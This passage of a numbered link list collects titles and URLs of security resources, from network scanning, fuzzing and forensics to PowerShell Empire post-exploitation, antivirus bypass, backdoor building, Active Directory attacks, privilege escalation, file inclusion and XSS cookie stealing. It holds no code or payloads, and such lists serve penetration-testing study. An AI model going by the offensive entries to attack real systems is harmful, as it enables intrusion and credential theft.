Linux:\n\n\n\nhttps://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux\n\n\n\n-1482-A Complete Guide to Nmap:\n\n\n\nhttps://www.edureka.co/blog/nmap-tutorial/\n\n\n\n\n-1483-Nmap from Beginner to Advanced :\n\n\n\nhttps://resources.infosecinstitute.com/nmap/\n\n\n\n-1484-Using Wireshark: Identifying Hosts and Users:\n\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/\n\n\n\n\n-1485-tshark tutorial and filter examples:\n\n\n\nhttps://hackertarget.com/tshark-tutorial-and-filter-examples/\n\n\n\n-1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example:\n\n\n\nhttps://www.guru99.com/fuzz-testing.html\n\n\n\n\n-1487-Tutorial: Dumb Fuzzing - Peach Community Edition:\n\n\n\ncommunity.peachfuzzer.com/v3/TutorialDumbFuzzing.html\n\n\n\n\n-1488-HowTo: ExploitDev Fuzzing:\n\n\n\nhttps://hansesecure.de/2018/03/howto-exploitdev-fuzzing/\n\n\n\n\n-1489-Fuzzing with Metasploit:\n\n\n\nhttps://www.corelan.be/?s=fuzzing\n\n\n\n\n-1490-Fuzzing – how to find bugs automagically using AFL:\n\n\n\n9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/\n\n\n\n\n\n-1491-Introduction to File Format Fuzzing & Exploitation:\n\n\n\nhttps://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3\n\n\n\n\n-1492-0x3 Python Tutorial: Fuzzer:\n\n\n\nhttps://www.primalsecurity.net/0x3-python-tutorial-fuzzer/\n\n\n\n\n-1493-Hunting For Bugs With AFL:\n\n\n\nhttps://research.aurainfosec.io/hunting-for-bugs-101/\n\n\n\n\n-1494-Fuzzing: The New Unit Testing:\n\n\n\n\nhttps://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing\n\n\n\n-1495-Fuzzing With Peach Framework:\n\n\nhttps://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/\n\n\n\n\n-1496-How we found a tcpdump vulnerability using cloud fuzzing:\n\n\n\nhttps://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/\n\n\n\n\n-1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley:\n\n\n\nhttps://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4\n\n\n\n\n-1498-Android malware analysis:\n\n\n\nhttps://www.slideshare.net/rossja/android-malware-analysis-71109948\n\n\n\n-1499-15+ Malware Analysis Tools & Techniques :\n\n\nhttps://www.template.net/business/tools/malware-analysis/\n\n\n\n\n-1500-30 Online Malware Analysis Sandboxes / Static Analyzers:\n\n\n\nhttps://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35\n\n\n\n-1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:\n\n\n\nhttps://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/\n\n\n\n-1502-Cheat Sheets - SANS Digital Forensics:\n\n\n\nhttps://digital-forensics.sans.org/community/cheat-sheets\n\n\n\n\n-1503-Breach detection with Linux filesystem forensics:\n\n\n\n\nhttps://opensource.com/article/18/4/linux-filesystem-forensics\n\n\n\n\n-1504-Digital Forensics Cheat Sheets Collection :\n\n\n\n\nhttps://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/\n\n\n\n\n-1505-Security Incident Survey Cheat Sheet for Server Administrators:\n\n\n\nhttps://zeltser.com/security-incident-survey-cheat-sheet/\n\n\n\n-1506-Digital forensics: A cheat sheet :\n\n\n\nhttps://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/\n\n\n\n\n-1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux:\n\n\n\nhttps://www.pinterest.cl/pin/794815034207804059/\n\n\n\n\n-1508-Windows IR Live Forensics Cheat Sheet:\n\n\n\nhttps://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/\n\n\n\n\n-1509-10 Best Known Forensics Tools That Works on Linux:\n\n\n\nhttps://linoxide.com/linux-how-to/forensics-tools-linux/\n\n\n\n-1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins:\n\n\n\nhttps://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/\n\n\n\n\n-1511-Windows Volatile Memory Acquisition & Forensics 2018:\n\n\n\nhttps://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd\n\n\n\n\n-1512-PowerShell Cheat Sheet :\n\n\n\nhttps://www.digitalforensics.com/blog/powershell-cheat-sheet-2/\n\n\n\n\n-1513-Forensic Artifacts: evidences of program execution on Windows systems:\n\n\n\n\n\nhttps://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems\n\n\n\n-1514-How to install a CPU?:\n\n\nhttps://www.computer-hardware-explained.com/how-to-install-a-cpu.html\n\n\n\n-1515-How To Upgrade and Install a New CPU or Motherboard:\n\n\n\nhttps://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both\n\n\n\n-1516-Installing and Troubleshooting CPUs:\n\n\n\nwww.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2\n\n\n\n\n\n-1517-15 FREE Pastebin Alternatives You Can Use Right Away:\n\n\n\nhttps://www.rootreport.com/pastebin-alternatives/\n\n\n\n\n-1518-Basic computer troubleshooting steps:\n\n\n\nhttps://www.computerhope.com/basic.htm\n\n\n\n\n-1519-18 Best Websites to Learn Computer Troubleshooting and Tech support:\n\n\n\nhttp://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support\n\n\n\n\n\n-1520-Post Exploitation with PowerShell Empire 2.3.0 :\n\n\n\nhttps://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/\n\n\n\n\n-1521-Windows Persistence with PowerShell Empire :\n\n\nhttps://www.hackingarticles.in/windows-persistence-with-powershell-empire/\n\n\n\n\n-1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial:\n\n\n\nhttps://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial\n\n\n\n\n-1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire :\n\n\n\nhttps://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/\n\n\n\n\n-1524-Hacking with Empire – PowerShell Post-Exploitation Agent :\n\n\n\nhttps://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/\n\n\n\n\n-1525-Hacking Windows Active Directory Full guide:\n\n\n\nwww.kalitut.com/hacking-windows-active-directory-full.html\n\n\n\n-1526-PowerShell Empire for Post-Exploitation:\n\n\n\n\nhttps://www.hackingloops.com/powershell-empire/\n\n\n\n-1527-Generate A One-Liner – Welcome To LinuxPhilosophy!:\n\n\n\nlinuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/\n\n\n\n\n-1528-CrackMapExec - Ultimate Guide:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/\n\n\n\n\n-1529-PowerShell Logging and Security:\n\n\n\nhttps://www.secjuice.com/enterprise-powershell-protection-logging/\n\n\n\n\n-1530-Create your own FUD Backdoors with Empire:\n\n\n\n\nhttp://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/\n\n\n\n\n-1531-PowerShell Empire Complete Tutorial For Beginners:\n\n\n\nhttps://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html\n\n\n\n\n-1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell:\n\n\n\nhttps://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell\n\n\n\n-1533-Kerberoasting - Stealing Service Account Credentials:\n\n\n\nhttps://www.scip.ch/en/?labs.20181011\n\n\n\n\n-1534-Automating Mimikatz with Empire and DeathStar :\n\n\n\nhttps://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/\n\n\n\n\n-1535-Windows oneliners to get shell :\n\n\n\n\nhttps://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/\n\n\n\n\n-1536-ObfuscatedEmpire :\n\n\n\nhttps://cobbr.io/ObfuscatedEmpire.html\n\n\n\n\n-1537-Pentesting with PowerShell in six steps:\n\n\n\nhttps://periciacomputacional.com/pentesting-with-powershell-in-six-steps/\n\n\n\n\n-1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM):\n\n\n\nhttps://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm\n\n\n\n\n-1539-PowerShell Security Best Practices:\n\n\n\nhttps://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/\n\n\n\n\n-1540-You can detect PowerShell attacks:\n\n\n\nhttps://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks\n\n\n\n\n-1541-Detecting and Preventing PowerShell Attacks:\n\n\n\n\nhttps://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks\n\n\n\n\n-1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security:\n\n\n\nhttps://adsecurity.org/?p=2604\n\n\n\n\n-1543-An Internal Pentest Audit Against Active Directory:\n\n\n\nhttps://www.exploit-db.com/docs/46019\n\n\n\n\n-1544-A complete Active Directory Penetration Testing Checklist :\n\n\n\n\nhttps://gbhackers.com/active-directory-penetration-testing-checklist/\n\n\n\n\n-1545-Active Directory | Penetration Testing Lab:\n\n\n\nhttps://pentestlab.blog/tag/active-directory/\n\n\n\n\n-1546-Building and Attacking an Active Directory lab with PowerShell :\n\n\n\n\nhttps://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell\n\n\n\n\n-1547-Penetration Testing in Windows Server Active Directory using Metasploit:\n\n\n\nhttps://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1\n\n\n\n\n-1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) :\n\n\n\nhttps://www.anitian.com/red-team-testing-going-all-the-way-part2/\n\n\n\n\n-1549-Penetration Testing Active Directory, Part II:\n\n\n\nhttps://www.jishuwen.com/d/2Mtq\n\n\n\n\n-1550-Gaining Domain Admin from Outside Active Directory:\n\n\n\n\nhttps://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html\n\n\n\n\n-1551-Post Exploitation Cheat Sheet:\n\n\n\nhttps://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet\n\n\n\n\n-1552-Windows post-exploitation :\n\n\n\n\nhttps://github.com/emilyanncr/Windows-Post-Exploitation\n\n\n\n\n-1553-OSCP - Windows Post Exploitation :\n\n\n\n\nhttps://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html\n\n\n\n\n-1554-Windows Post-Exploitation Command List:\n\n\n\nhttp://pentest.tonyng.net/windows-post-exploitation-command-list/\n\n\n\n\n-1555-Windows Post-Exploitation Command List:\n\n\n\n\nhttp://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html\n\n\n\n\n-1556-Linux Post-Exploitation · OSCP - Useful Resources:\n\n\n\n\nhttps://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html\n\n\n\n\n-1557-Pentesting Cheatsheet:\n\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n\n\n-1558-Pentesting Cheatsheets - Red Teaming Experiments:\n\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets\n\n\n\n\n-1559-OSCP Goldmine:\n\n\n\nhttp://0xc0ffee.io/blog/OSCP-Goldmine\n\n\n\n\n-1560-Linux Post Exploitation Cheat Sheet:\n\n\n\nhttp://red-orbita.com/?p=8455\n\n\n\n\n-1562-OSCP useful resources and tools:\n\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n\n\n-1563-Windows Post-Exploitation Command List :\n\n\n\n\nhttps://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List\n\n\n\n\n-1564-Metasploit Cheat Sheet:\n\n\n\nhttps://pentesttools.net/metasploit-cheat-sheet/\n\n\n\n\n-1565-Windows Privilege Escalation:\n\n\n\nhttps://awansec.com/windows-priv-esc.html\n\n\n\n\n-1566-Linux Unix Bsd Post Exploitation:\n\n\n\nhttps://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation\n\n\n\n\n-1567-Privilege Escalation & Post-Exploitation:\n\n\n\nhttps://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/\n\n\n\n\n-1568-Metasploit Cheat Sheet:\n\n\n\nhttps://vk-intel.org/2016/12/28/metasploit-cheat-sheet/\n\n\n\n\n-1569-Metasploit Cheat Sheet :\n\n\n\nhttps://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/\n\n\n\n\n-1570-Privilege escalation: Linux:\n\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux\n\n\n\n\n-1571-Cheat Sheets — Amethyst Security:\n\n\n\n\nhttps://www.ssddcyber.com/cheatsheets\n\n\n\n\n-1572-Responder - CheatSheet:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1573-Cheatsheets:\n\n\n\nhttps://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt\n\n\n\n\n-1574-Are you ready for OSCP?:\n\n\n\nhttps://www.hacktoday.io/t/are-you-ready-for-oscp/59\n\n\n\n\n-1575-Windows Privilege Escalation:\n\n\n\nhttps://labs.p64cyber.com/windows-privilege-escalation/\n\n\n\n\n-1576-A guide to Linux Privilege Escalation:\n\n\n\nhttps://payatu.com/guide-linux-privilege-escalation/\n\n\n\n\n-1577-Windows Post-Exploitation-Cheat-Sheet:\n\n\n\n\nhttp://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/\n\n\n\n-1578-Windows Privilege Escalation (privesc) Resources:\n\n\n\nhttps://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/\n\n\n\n-1579-Dissecting Mobile Malware:\n\n\n\nhttps://slideplayer.com/slide/3434519/\n\n\n\n\n-1580-Android malware analysis with Radare: Dissecting the Triada Trojan:\n\n\n\n\nwww.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/\n\n\n\n\n-1581-Dissecting Mobile Native Code Packers:\n\n\n\nhttps://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/\n\n\n\n\n-1582-What is Mobile Malware? Defined, Explained, and Explored:\n\n\n\nhttps://www.forcepoint.com/cyber-edu/mobile-malware\n\n\n\n\n-1583-Malware Development — Professionalization of an Ancient Art:\n\n\n\nhttps://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b\n\n\n\n\n-1584-Weaponizing Malware Code Sharing with Cythereal MAGIC:\n\n\n\nhttps://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d\n\n\n\n\n-1585-Web App Pentest Cheat Sheet:\n\n\n\nhttps://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773\n\n\n\n\n-1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued:\n\n\n\nhttps://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf\n\n\n\n\n-1587-How to Run An External Pentest:\n\n\n\nhttps://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a\n\n\n\n\n-1588-Advice for new pentesters:\n\n\n\nhttps://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea\n\n\n\n\n-1589-NodeJS Application Pentest Tips:\n\n\n\nhttps://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e\n\n\n\n\n-1590-How to combine Pentesting with Automation to improve your security:\n\n\n\nhttps://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security\n\n\n\n-1591-Day 79: FTP Pentest Guide:\n\n\n\nhttps://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a\n\n\n\n\n-1592-SigintOS: A Wireless Pentest Distro Review:\n\n\n\nhttps://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b\n\n\n\n\n-1593-Conducting an IoT Pentest :\n\n\n\nhttps://medium.com/p/6fa573ac6668?source=user_profile...\n\n\n\n\n-1594-Efficient way to pentest Android Chat Applications:\n\n\n\nhttps://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f\n\n\n\n\n-1595-APT2 - Automated PenTest Toolkit :\n\n\n\nhttps://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href\n\n\n\n-1596-Pentest Tools and Distros:\n\n\n\nhttps://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d\n\n\n\n\n-1597-Keeping notes during a pentest/security assessment/code review:\n\n\n\nhttps://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b\n\n\n\n\n-1598-An intro to pentesting an Android phone:\n\n\n\nhttps://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39\n\n\n\n-1599-The Penetration Testing Report:\n\n\n\nhttps://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2\n\n\n\n-1600-VA vs Pentest:\n\n\n\nhttps://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03\n\n\n\n-1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux:\n\n\n\nhttps://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f\n\n\n\n-1602-Pentesting Ethereum dApps:\n\n\n\nhttps://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19\n\n\n\n\n-1603-Android pentest lab in a nutshell :\n\n\n\n\nhttps://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3\n\n\n\n-1604-Pentest Magazine: Web Scraping with Python :\n\n\n\nhttps://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3\n\n\n\n-1605-Pentesting iOS apps without jailbreak:\n\n\n\nhttps://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e\n\n\n\n\n-1606-OSCP/Pen Testing Resources:\n\n\n\n\nhttps://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45\n\n\n\n\n-1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting):\n\n\n\nhttps://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc\n\n\n\n-1608-Local File Inclusion (LFI) — Web Application Penetration Testing:\n\n\n\nhttps://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601\n\n\n\n-1609-Local File Inclusion (Basic):\n\n\nhttps://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3\n\n\n\n-1610-PHP File Inclusion Vulnerability:\n\n\n\nhttps://www.immuniweb.com/vulnerability/php-file-inclusion.html\n\n\n\n\n-1611-Local File Inclusion:\n\n\n\n\nhttps://teambi0s.gitlab.io/bi0s-wiki/web/lfi/\n\n\n\n\n-1612-Web Application Penetration Testing: Local File Inclusion:\n\n\n\nhttps://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/\n\n\n\n\n-1613-From Local File Inclusion to Code Execution :\n\n\n\nhttps://resources.infosecinstitute.com/local-file-inclusion-code-execution/\n\n\n\n\n-1614-RFI / LFI:\n\n\n\nhttps://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/\n\n\n\n\n-1615-From Local File Inclusion to Remote Code Execution - Part 2:\n\n\n\nhttps://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2\n\n\n\n\n-1616-Local File Inclusion:\n\n\n\nhttps://xapax.gitbooks.io/security/content/local_file_inclusion.html\n\n\n\n-1617-Beginner Guide to File Inclusion Attack (LFI/RFI) :\n\n\n\nhttps://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/\n\n\n\n\n-1618-LFI / RFI:\n\n\n\nhttps://secf00tprint.github.io/blog/payload-tester/lfirfi/en\n\n\n\n\n-1619-LFI and RFI Attacks - All You Need to Know:\n\n\n\n\nhttps://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/\n\n\n\n\n-1620-Log Poisoning - LFI to RCE :\n\n\n\nhttp://liberty-shell.com/sec/2018/05/19/poisoning/\n\n\n\n-1621-LFI:\n\n\n\nhttps://www.slideshare.net/cyber-punk/lfi-63050678\n\n\n\n\n-1622-Hand Guide To Local File Inclusion(LFI):\n\n\n\nwww.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html\n\n\n\n\n-1623-Local File Inclusion (LFI) - Cheat Sheet:\n\n\n\nhttps://ironhackers.es/herramientas/lfi-cheat-sheet/\n\n\n\n\n-1624-Web Application Penetration Testing Local File Inclusion (LFI):\n\n\n\n\nhttps://www.cnblogs.com/Primzahl/p/6258149.html\n\n\n\n\n-1625-File Inclusion Vulnerability Prevention:\n\n\n\n\nhttps://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/\n\n\n\n\n-1626-The Most In-depth Hacker's Guide:\n\n\n\nhttps://books.google.com/books?isbn=1329727681\n\n\n\n\n-1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking:\n\n\n\n\nhttps://books.google.com/books?id=e6CHDwAAQBAJ\n\n\n\n\n-1628-Web App Hacking, Part 11: Local File Inclusion:\n\n\n\nhttps://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI\n\n\n\n\n-1629-Local and remote file inclusion :\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi\n\n\n\n\n\n-1630-Upgrade from LFI to RCE via PHP Sessions :\n\n\n\nhttps://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/\n\n\n\n\n-1631-CVV #1: Local File Inclusion:\n\n\n\nhttps://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a\n\n\n\n\n-1632-(PDF) Cross Site Scripting (XSS) in Action:\n\n\n\n\n\nhttps://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action\n\n\n\n\n\n-1633-XSS exploitation part 1:\n\n\n\nwww.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html\n\n\n\n\n\n-1634-Weaponizing self-xss:\n\n\n\n\nhttps://silentbreaksecurity.com/weaponizing-self-xss/\n\n\n\n\n-1635-Cookie Tracking and Stealing using Cross-Site Scripting:\n\n\n\n\nhttps://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/\n\n\n\n\n-1636-Defense against the Black Arts:\n\n\n\nhttps://books.google.com/books?isbn=1439821224\n\n\n\n\n-1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:\n\n\n\n\nhttps://www.acunetix.com/websitesecurity/csrf-attacks/\n\n\n\n\n\n-1638-Bypassing CSRF protection:\n\n\n\n\nhttps://www.bugbountynotes.com/training/tutorial?id=5\n\n\n\n\n-1639-Stealing CSRF tokens with XSS:\n\n\n\nhttps://digi.ninja/blog/xss_steal_csrf_token.php\n\n\n\n\n-1640-Same Origin Policy and ways to Bypass:\n\n\n\n\nhttps://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12\n\n\n\n\n-1641-Bypassing Same Origin Policy :\n\n\n\nhttps://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/\n\n\n\n-1642-Client-Side Attack - an overview :\n\n\n\n\nhttps://www.sciencedirect.com/topics/computer-science/client-side-attack\n\n\n\n\n-1643-Client-Side Injection Attacks:\n\n\n\nhttps://blog.alertlogic.com/blog/client-side-injection-attacks/\n\n\n\n\n-1645-The Client-Side Battle Against JavaScript Attacks Is Already Here:\n\n\n\n\nhttps://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2\n\n\n\n\n\n-1646-Why Let’s Encrypt is a really, really, really bad idea:\n\n\n\n\nhttps://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801\n\n\n\n\n\n-1647-Huge Guide to Client-Side Attacks:\n\n\n\n\nhttps://www.notion.so/d382649cfebd4c5da202677b6cad1d40\n\n\n\n\n-1648-OSCP Prep – Episode 11: Client Side Attacks:\n\n\n\n\nhttps://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/\n\n\n\n\n\n-1649-Client side attack - AV Evasion:\n\n\n\n\n\nhttps://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack\n\n\n\n\n-1650-Client-Side Attack With Metasploit (Part 4):\n\n\n\n\nhttps://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/\n\n\n\n\n\n-1651-Ransomware: Latest Developments and How to Defend Against Them:\n\n\n\n\nhttps://www.recordedfuture.com/latest-ransomware-attacks/\n\n\n\n-1652-Cookie Tracking and Stealing using Cross-Site Scripting:\n\n\n\nhttps://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/\n\n\n\n\n-1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords:\n\n\n\nhttps://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833\n\n\n\n-1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site:\n\n\n\n\nhttps://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d\n\n\n\n\n-1655-Steal victim's cookie using Cross Site Scripting (XSS) :\n\n\n\n\nhttps://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/\n\n\n\n\n-1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security:\n\n\n\n\nhttps://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86\n\n\n\n\n-1657-Remote Command Execution:\n\n\n\nhttps://hacksland.net/remote-command-execution/\n\n\n\n\n-1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough:\n\n\n\n\nhttps://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2\n\n\n\n\n-1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit):\n\n\n\n\nhttps://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/\n\n\n\n\n-1660-XXE - ZeroSec - Adventures In Information Security:\n\n\n\n\nhttps://blog.zsec.uk/out-of-band-xxe-2/\n\n\n\n\n-1661-Exploitation: XML External Entity (XXE) Injection:\n\n\n\n\nhttps://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection\n\n\n\n\n-1662-Hack The Box: DevOops:\n\n\n\n\nhttps://redteamtutorials.com/2018/11/11/hack-the-box-devoops/\n\n\n\n\n-1663-Web Application Penetration Testing Notes:\n\n\n\n\nhttps://techvomit.net/web-application-penetration-testing-notes/\n\n\n\n\n-1664-WriteUp – Aragog (HackTheBox) :\n\n\n\n\nhttps://ironhackers.es/en/writeups/writeup-aragog-hackthebox/\n\n\n\n\n-1665-Linux Privilege Escalation Using PATH Variable:\n\n\n\nhttps://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/\n\n\n\n\n-1666-Linux Privilege Escalation via Automated Script :\n\n\n\nhttps://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/\n\n\n\n\n-1667-Privilege Escalation - Linux :\n\n\n\nhttps://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html\n\n\n\n-1668-Linux Privilege Escalation:\n\n\n\nhttps://percussiveelbow.github.io/linux-privesc/\n\n\n\n-1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit :\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/\n\n\n\n\n-1670-Linux Privilege Escalation With Kernel Exploit:\n\n\n\nhttps://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/\n\n\n\n-1671-Reach the root! How to gain privileges in Linux:\n\n\n\nhttps://hackmag.com/security/reach-the-root/\n\n\n\n-1672-Enumeration for Linux Privilege Escalation:\n\n\n\nhttps://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959\n\n\n\n\n-1673-Linux Privilege Escalation Scripts :\n\n\n\n\nhttps://netsec.ws/?p=309\n\n\n\n-1674-Understanding Privilege Escalation:\n\n\n\nwww.admin-magazine.com/Articles/Understanding-Privilege-Escalation\n\n\n\n\n\n-1675-Toppo:1 | Vulnhub Walkthrough:\n\n\n\nhttps://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d\n\n\n\n\n-1676-Privilege Escalation resources:\n\n\n\nhttps://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources\n\n\n\n\n-1678-OSCP Notes – Privilege Escalation (Linux):\n\n\n\nhttps://securism.wordpress.com/oscp-notes-privilege-escalation-linux/\n\n\n\n\n-1679-Udev Exploit Allows Local Privilege Escalation :\n\n\n\nwww.madirish.net/370\n\n\n\n\n-1680-Understanding Linux Privilege Escalation and Defending Against It:\n\n\n\n\nhttps://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it\n\n\n\n\n-1681-Windows Privilege Escalation Using PowerShell:\n\n\n\nhttps://hacknpentest.com/windows-privilege-escalation-using-powershell/\n\n\n\n-1682-Privilege Escalation | Azeria 